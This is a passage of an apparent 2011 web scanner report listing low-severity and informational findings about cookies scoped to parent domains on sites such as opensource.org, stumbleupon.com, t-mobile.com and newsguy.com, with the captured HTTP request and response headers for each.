<head><meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>
   NetLingo on Myspace
</title>
       <script type="text/ja
...[SNIP]...

13.34. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.networkworld.com
Path:	/community/blog/ebay-use-joomla-open-source-glue

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESSa27dc0841fd4d8567c009be96a283c67=cl3ko5pm3b3hr81s3vr2lv1nc2; expires=Thu, 17-Feb-2011 08:37:13 GMT; path=/; domain=.networkworld.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.35. http://www.opensource.org/licenses/bsd-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/bsd-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=orttk62qs56op2so5ctlcpa9u7; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/bsd-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=orttk62qs56op2so5ctlcpa9u7; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:01:58 GMT
ETag: "7de37e433f136f70754431d33998090d"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.36. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=4iogpts99t9ivnkufvcubm4sb4; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=4iogpts99t9ivnkufvcubm4sb4; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:02:12 GMT
ETag: "c78bed29e3c1e7584db2cae96691f4e3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.37. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=cqn9psagddni8r0cu6qcets3f0; expires=Thu, 17-Feb-2011 03:42:02 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:42 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=cqn9psagddni8r0cu6qcets3f0; expires=Thu, 17-Feb-2011 03:42:02 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:01:06 GMT
ETag: "ecf056aef437e96f0aaa9888d3f21414"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

13.38. http://www.packtpub.com/award previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.packtpub.com
Path:	/award

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS93d7a233ed897d918b53457b98164e93=fpu3r74605hmvi8pofbnt04583; expires=Tue, 25-Jan-2011 15:15:08 GMT; path=/; domain=.packtpub.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /award HTTP/1.1
Host: www.packtpub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 15:15:08 GMT
Server: Apache
Set-Cookie: SESS93d7a233ed897d918b53457b98164e93=fpu3r74605hmvi8pofbnt04583; expires=Tue, 25-Jan-2011 15:15:08 GMT; path=/; domain=.packtpub.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:15:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Location: http://www.packtpub.com/open-source-awards-home
Vary: Accept-Encoding
Content-Length: 1
Content-Type: text/html; charset=utf-8
Connection: close

13.39. http://www.stumbleupon.com/submit previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.stumbleupon.com
Path:	/submit

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=et4p0cs6c4ufsh9057l6j77nm3; path=/; domain=.stumbleupon.com; HttpOnly
cmf_i=13426481494d3e53cc345a97.61014341; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
cmf_spr=A%2FN; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
su_c=92463dc5d22c4f2ef5a9ff3749f7e1d8%7C%7C10%7C%7C1295930316%7C4385bda480c51506e13ba04652aa4a57; expires=Fri, 22-Jan-2021 04:38:36 GMT; path=/; domain=.stumbleupon.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=et4p0cs6c4ufsh9057l6j77nm3; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=13426481494d3e53cc345a97.61014341; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=92463dc5d22c4f2ef5a9ff3749f7e1d8%7C%7C10%7C%7C1295930316%7C4385bda480c51506e13ba04652aa4a57; expires=Fri, 22-Jan-2021 04:38:36 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7324
Date: Tue, 25 Jan 2011 04:38:36 GMT
X-Varnish: 2659461572
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...

13.40. http://www.t-mobile.com/Company/Community.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.t-mobile.com
Path:	/Company/Community.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
TMobileCommon=TeaId=1a4c4817-e07d-4717-85bc-99437711e569; domain=.t-mobile.com; path=/
PartnerExpiration=PARTNER=!2%2f8%2f2011+4%3a38%3a47+AM; domain=.t-mobile.com; expires=Wed, 25-Jan-2012 04:38:47 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Company/Community.aspx?tp=Abt_Tab_HandsetRecycling HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.41. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=alnYSwtZdPuoP7SpJnHoOn6TC7uVaZblA87K1ygX0f1hWyZaf6EZanRaimVUiRN9IbgAkGg1BT4ERS3XZcApBAXusAVvGZcoKa4EAukyTAwZbPf3HZdeC8vRYsIZcwZbZbUlgTx2pGMLGTUxSpnpnuGgneS4uRH3F5UIxyV2vItfFS4p24eqKnVPrweM91kBCNbZaOJZcDFjxos4ePmdX9ScRZcCH4xkEGVN30HIh9PAFi7B076lbqqZbZdvgymSbR4XnZaYtW7YU66NirjJYfbFR3Zd1VIDlOQtDHUTykSEIT; path=/; domain=.tribalfusion.com; expires=Mon, 25-Apr-2011 01:35:47 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=345683&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aDnW0LrwZayOnXwr1QHr2jw47YFSRv4Za7XcQkGtYZdRZcWf7wADFEVHJyPbI34C71hPcXHKqC4rKUR10ZauE2JtrnsNVwlCTDlBxKRo78YQefyFwV2spqhEjwpgWtMSLxFV7yjY44B29vthYSxQDZdm0Y0mEGGuq3vvM6sZbWWCBS9ygvc7XVZbdDZaekm5Kmxbh5WlcNUFZa1fiHcrP5N16q6mbZarKtmZagM8Uv3qPGsepQSrfNK9vOubwfVB3hYbZbKmqUUdsYdVgLIeb

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=alnYSwtZdPuoP7SpJnHoOn6TC7uVaZblA87K1ygX0f1hWyZaf6EZanRaimVUiRN9IbgAkGg1BT4ERS3XZcApBAXusAVvGZcoKa4EAukyTAwZbPf3HZdeC8vRYsIZcwZbZbUlgTx2pGMLGTUxSpnpnuGgneS4uRH3F5UIxyV2vItfFS4p24eqKnVPrweM91kBCNbZaOJZcDFjxos4ePmdX9ScRZcCH4xkEGVN30HIh9PAFi7B076lbqqZbZdvgymSbR4XnZaYtW7YU66NirjJYfbFR3Zd1VIDlOQtDHUTykSEIT; path=/; domain=.tribalfusion.com; expires=Mon, 25-Apr-2011 01:35:47 GMT;
Content-Type: text/html
Location: http://tag.admeld.com/pixel?admeld_adprovider_id=12&expiration=30days&custom_segment4=1&custom_segment504=1&redirect=http://ad.yieldmanager.com/pixel?id=708017&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3615
Content-Length: 0
Connection: keep-alive

13.42. https://acc.newsguy.com/a/memsubmit.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/a/memsubmit.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DIGEST=9X4cj3HMWW55_p6OOm9h6em4opp0oWW0L4d3d945a; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.43. https://acc.newsguy.com/user/-/accnt_billing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_billing

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.44. https://acc.newsguy.com/user/-/accnt_contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_contact

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.45. https://acc.newsguy.com/user/-/accnt_flash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_flash

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.46. https://acc.newsguy.com/user/-/accnt_history previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_history

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DIGEST=V7YlZkC_LNm7StDUl.fCuemaopp0oWW0L4d3d923c; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.47. https://acc.newsguy.com/user/-/customer_referrals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/customer_referrals

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.48. https://acc.newsguy.com/user/-/referrals_cashout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/referrals_cashout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.49. https://acc.newsguy.com/user/accnt_overview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DIGEST=.NtkeVYzZQxxA.BCeif7Dem4opp0oWW0L4d3d944f; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.50. https://acc.newsguy.com/user/accnt_renew previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_renew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DIGEST=H7MjtTwyFzdgi1ol1ako0emqopp0oWW0L4d3d9453; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.51. https://acc.newsguy.com/user/accnt_settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_settings

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.52. https://acc.newsguy.com/user/accnt_signup_usenet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_signup_usenet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DIGEST=dLOXayhNSH0bYlx_7dbu1emqopp0oWW0L4d3d9459; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.53. https://acc.newsguy.com/user/accnt_upgrade previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_upgrade

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

DIGEST=F1xwYpJIfeFc7m0gMa_onemKopp0oWW0L4d3d9456; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.54. http://action.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
clid=2lebnns011706ch47d7o8wtv18e3v00g0o02050210f; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
rdrlst=2110s7dpletz4d0000000c0o02050210co2ylebnns0000000g0o02050210f10elfk1rn000000010o010501101mmnlebnns0000000g0o02050210fxo1lebnns0000000g0o02050210fx1blebnns0000000g0o02050210feh5lf17qf000000080o0205021086bylemlne0000000e0o02050210ew3clebnns0000000g0o02050210f7gmlebnns0000000g0o02050210fjv6lebnns0000000g0o02050210fj4ilew2e20000000a0o02050210axthlebnns0000000g0o02050210ffullf8gij000000040o02050210410flfk1rn000000010o0105011010c9lfk1rn000000010o010501101jillebnns0000000g0o02050210ffuqlegh2b0000000f0o02050210fb6mlf17qk000000070o020502107mz1lebnns0000000g0o02050210fcajlfk1rn000000010o010501101p7vlebnns0000000g0o02050210f7vglfk1rn000000010o010501101xvslebnns0000000g0o02050210f10elfk1rn000000010o01050110110rlfjpei000000020o020502102xuklebnns0000000g0o02050210fx1jlebnns0000000g0o02050210fjk7lebnns0000000g0o02050210fcbnlfk1rn000000010o010501101yiplebnns0000000g0o02050210fyh0lebnns0000000g0o02050210fxwflebnns0000000g0o02050210fe4vlebnns0000000g0o02050210f10elfk1rn000000010o010501101jwblfk1rn000000010o010501101xwblebnns0000000g0o02050210f; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo000000060o020502106ag2leqh190tkqe00d0o02050210d82gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns181qq00g0o02050210f5q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000020o020502102820lebnns181qq00e0l000400100b0olfjpei000000020o020502102ab4lebnns181qq00g0o02050210f9szlebnns181qq00g0o02050210f8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b13kpc00f0o02050210fal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns181qq00e0l0004001007y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei000000020o020502102b08lfjpei000000020o02050210240slebnns181qq00e0l00040010045mlfdxmc000000030o020502103a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=4548&pcv=47 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv181qq00f0o01050110e; rdrlst=20s0so2ylebnns0000000f0o01050110e7dpletz4d0000000b0o01050110bmmnlebnns0000000f0o01050110e10rlfjpei000000010o010501101x1blebnns0000000f0o01050110exo1lebnns0000000f0o01050110eeh5lf17qf000000070o0105011076bylemlne0000000d0o01050110dw3clebnns0000000f0o01050110e7gmlebnns0000000f0o01050110ejv6lebnns0000000f0o01050110ej4ilew2e2000000090o010501109xthlebnns0000000f0o01050110efullf8gij000000030o010501103jillebnns0000000f0o01050110efuqlegh2b0000000e0o01050110eb6mlf17qk000000060o010501106mz1lebnns0000000f0o01050110ep7vlebnns0000000f0o01050110exvslebnns0000000f0o01050110exuklebnns0000000f0o01050110ex1jlebnns0000000f0o01050110ejk7lebnns0000000f0o01050110eyiplebnns0000000f0o01050110exwflebnns0000000f0o01050110eyh0lebnns0000000f0o01050110ee4vlebnns0000000f0o01050110exwblebnns0000000f0o01050110e; sglst=2140s8dtletz4d0pqa500a0l00040010061gletz4d0pqa500a0l000400100a70lebnns181qq00e0l0004001005b0lf17qo000000050o01050110582gletz4d0pqa500a0l000400100ag2leqh190t8d900c0o01050110c82hlebnns181qq00f0o01050110e9zdlebnns181qq00e0l0004001005q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei000000010o010501101820lebnns181qq00e0l000400100b0olfjpei000000010o010501101ab4lebnns181qq00f0o01050110e9szlebnns181qq00f0o01050110e8wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b138c700e0o01050110eal1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l000400100b0clfjpei000000010o0105011018bgletz4d0pqa500a0l0004001007y2lebnns181qq00e0l0004001005q8lebnns181qq00e0l000400100b08lfjpei000000010o01050110140slebnns181qq00e0l0004001003s4letz4d0pqa500a0l000400100ah4lebnns181qq00e0l000400100a97lebnns181qq00e0l00040010045mlfdxmc000000020o01050110240uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv18e3v00g0o02050210f; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Set-Cookie: orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
Set-Cookie: rdrlst=2110s7dpletz4d0000000c0o02050210co2ylebnns0000000g0o02050210f10elfk1rn000000010o010501101mmnlebnns0000000g0o02050210fxo1lebnns0000000g0o02050210fx1blebnns0000000g0o02050210feh5lf17qf000000080o0205021086bylemlne0000000e0o02050210ew3clebnns0000000g0o02050210f7gmlebnns0000000g0o02050210fjv6lebnns0000000g0o02050210fj4ilew2e20000000a0o02050210axthlebnns0000000g0o02050210ffullf8gij000000040o02050210410flfk1rn000000010o0105011010c9lfk1rn000000010o010501101jillebnns0000000g0o02050210ffuqlegh2b0000000f0o02050210fb6mlf17qk000000070o020502107mz1lebnns0000000g0o02050210fcajlfk1rn000000010o010501101p7vlebnns0000000g0o02050210f7vglfk1rn000000010o010501101xvslebnns0000000g0o02050210f10elfk1rn000000010o01050110110rlfjpei000000020o020502102xuklebnns0000000g0o02050210fx1jlebnns0000000g0o02050210fjk7lebnns0000000g0o02050210fcbnlfk1rn000000010o010501101yiplebnns0000000g0o02050210fyh0lebnns0000000g0o02050210fxwflebnns0000000g0o02050210fe4vlebnns0000000g0o02050210f10elfk1rn000000010o010501101jwblfk1rn000000010o010501101xwblebnns0000000g0o02050210f; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 01:35:47 GMT; Path=/
